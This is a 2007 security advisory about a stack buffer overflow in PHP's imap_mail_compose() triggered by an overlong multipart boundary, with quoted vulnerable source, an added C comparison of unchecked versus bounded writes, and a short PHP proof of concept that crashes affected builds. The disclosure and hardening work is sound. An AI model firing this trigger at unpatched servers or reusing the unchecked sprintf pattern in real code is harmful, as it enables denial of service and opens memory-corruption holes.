
MOPB-40-2007: PHP imap_mail_compose() Boundary Stack Buffer Overflow Vulnerability

2007-04-08 00:00:00
vulners.com

Summary

PHP's imap_mail_compose() function, which can be used to construct multipart emails, overflows a stack buffer when it is passed an overlong boundary string. This can lead to arbitrary code execution.
Affected versions

Affected are PHP 4 < 4.4.5 and PHP 5 < 5.2.1
Detailed information

The imap_mail_compose() function constructs multipart emails in a fixed-size stack buffer called tmp.

PHP_FUNCTION(imap_mail_compose)
{

char tmp[8 * MAILTMPLEN], *mystring=NULL, *t=NULL, *tempstring=NULL;

When a multipart message is created, it first reads the BOUNDARY parameter from the input and copies it into the stack buffer with an unbounded sprintf call, without any size check.

if (bod && bod->type == TYPEMULTIPART) {

    /* first body part */
        part = bod->nested.part;

    /* find cookie */
        for (param = bod->parameter; param && !cookie; param = param->next) {
            if (!strcmp (param->attribute, "BOUNDARY")) {
                cookie = param->value;
            }
        }

    /* yucky default */
        if (!cookie) {
            cookie = "-";
        }

    /* for each part */
        do {
            t=tmp;
        /* build cookie */
            sprintf (t, "--%s%s", cookie, CRLF);

It should be obvious that this allows overflowing the buffer: the boundary string is attacker-controlled, its length is never compared against the size of tmp, and sprintf writes "--", the boundary and CRLF regardless of how much room is left.
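The following C program is an added example, not code from the advisory or from PHP. It mirrors the cookie-building step in isolation, with the unchecked sprintf kept only for comparison and a bounded variant beside it. It assumes MAILTMPLEN is 1024 (the value in the c-client mail.h shipped with PHP's imap extension), which is what makes tmp 8192 bytes and the 8192-byte boundary from the proof of concept an overflow by exactly the "--" prefix, CRLF and terminating NUL.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumption: c-client's mail.h defines MAILTMPLEN as 1024, so the
 * tmp buffer in imap_mail_compose() is 8 * 1024 = 8192 bytes. */
#define MAILTMPLEN 1024
#define TMPLEN (8 * MAILTMPLEN)
#define CRLF "\015\012"

/* Vulnerable pattern, as in the PHP source: the boundary length is never
 * checked.  Kept only for comparison; never call it on untrusted input. */
void build_cookie_unchecked(char *tmp, const char *cookie)
{
    sprintf(tmp, "--%s%s", cookie, CRLF);
}

/* Bytes a cookie line needs: "--" + boundary + CRLF + terminating NUL. */
size_t cookie_line_len(const char *cookie)
{
    return 2 + strlen(cookie) + strlen(CRLF) + 1;
}

/* Hardened variant: reject a boundary that does not fit, then use a
 * bounded write.  Returns 0 on success, -1 if the boundary is too long. */
int build_cookie_checked(char *tmp, size_t tmplen, const char *cookie)
{
    if (cookie_line_len(cookie) > tmplen)
        return -1;
    int n = snprintf(tmp, tmplen, "--%s%s", cookie, CRLF);
    if (n < 0 || (size_t)n >= tmplen)
        return -1;  /* defensive: snprintf would have truncated */
    return 0;
}

/* Models the advisory's proof of concept: a boundary of boundary_len 'A's
 * (constructed input).  Returns 1 if the unchecked sprintf would have
 * written past the 8192-byte tmp buffer, 0 if it fits, -1 on malloc failure. */
int poc_boundary_overflows(size_t boundary_len)
{
    char *cookie = malloc(boundary_len + 1);
    if (!cookie)
        return -1;
    memset(cookie, 'A', boundary_len);
    cookie[boundary_len] = '\0';

    char tmp[TMPLEN];
    int rc = build_cookie_checked(tmp, sizeof tmp, cookie);
    free(cookie);
    return rc == -1;
}

int main(void)
{
    char tmp[TMPLEN];
    const char *good = "=_NextPart_000";
    printf("boundary '%s': %s\n", good,
           build_cookie_checked(tmp, sizeof tmp, good) == 0 ? "ok" : "rejected");
    printf("8192-byte boundary (the PoC): %s\n",
           poc_boundary_overflows(8192) ? "rejected (would overflow tmp)" : "ok");
    return 0;
}
```

The check in build_cookie_checked is the one the original code lacks: the boundary comes straight from the caller's "type.parameters" array, so its length must be compared against the remaining room in tmp before anything is written. snprintf alone would stop the overflow but silently truncate the boundary, which is why the explicit length test comes first.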
Proof of concept, exploit or instructions to reproduce

To test for this vulnerability, run the following piece of code against an affected PHP build with the imap extension loaded.

<?php

// Envelope; the addresses are placeholders and are not used before the overflow.
$envelope["from"]= "[email protected]";
$envelope["to"] = "[email protected]";

// Multipart container whose BOUNDARY parameter is 8192 bytes long,
// the full size of the tmp buffer (8 * MAILTMPLEN) before "--" and CRLF are added.
$part1["type"] = TYPEMULTIPART;
$part1["subtype"] = "mixed";
$part1["type.parameters"] = array("BOUNDARY" => str_repeat("A",8192));

// A single text part so that the multipart body is actually built.
$part2["type"] = TYPETEXT;
$part2["subtype"] = "plain";
$part2["description"] = "description3";
$part2["contents.data"] = "contents.data3\n\n\n\t";

$body[1] = $part1;
$body[2] = $part2;

// Triggers the unchecked sprintf of the boundary into the stack buffer.
imap_mail_compose($envelope, $body);

?>

This little PoC will only crash PHP. A code execution exploit is, however, fairly straightforward. It will be added to the site in the future, so check back soon.
Notes

This vulnerability is just another incarnation of a run-of-the-mill ("08/15") stack-based buffer overflow.